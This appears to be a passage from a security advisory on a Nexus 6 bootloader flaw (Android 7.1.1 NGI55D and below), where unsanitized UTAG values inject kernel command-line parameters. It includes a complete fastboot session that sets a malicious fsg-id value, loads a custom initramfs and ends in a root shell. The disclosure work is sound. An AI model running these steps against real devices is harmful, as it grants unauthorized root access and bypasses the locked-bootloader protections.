Google Nexus 6
Android 7.1.1 NGI55D and below
The problem, however, is that the UTAGs, in the vulnerable versions of Android, are sanitized at the time of their modification – when the user issues the
fastboot config command, and not when they are actually inserted into the command line.
Therefore, had the attack occurred before the bootloader was updated, the offending payload would remain intact:
$ fastboot getvar version-bootloader version-bootloader: moto-apq8084-72.03 finished. total time: 0.001s $ fastboot oem config fsg-id ... (bootloader) <UTAG name="fsg-id" type="str" protected="false"> (bootloader) <value> (bootloader) a initrd=0x11000000,1519997 (bootloader) </value> (bootloader) <description> (bootloader) FSG IDs, see http://goo.gl/gPmhU (bootloader) </description> (bootloader) </UTAG> OKAY [ 0.009s] finished. total time: 0.009s $ fastboot flash a /aosp/misc/initroot.cpio.gz target reported max download size of 536870912 bytes sending 'a' (1484 KB)... OKAY [ 0.048s] writing 'a'... (bootloader) Not allowed in LOCKED state! FAILED (remote failure) finished. total time: 0.051s $ fastboot continue resuming boot... OKAY [ 0.001s] finished. total time: 0.001s $ shamu:/ # id uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:su:s0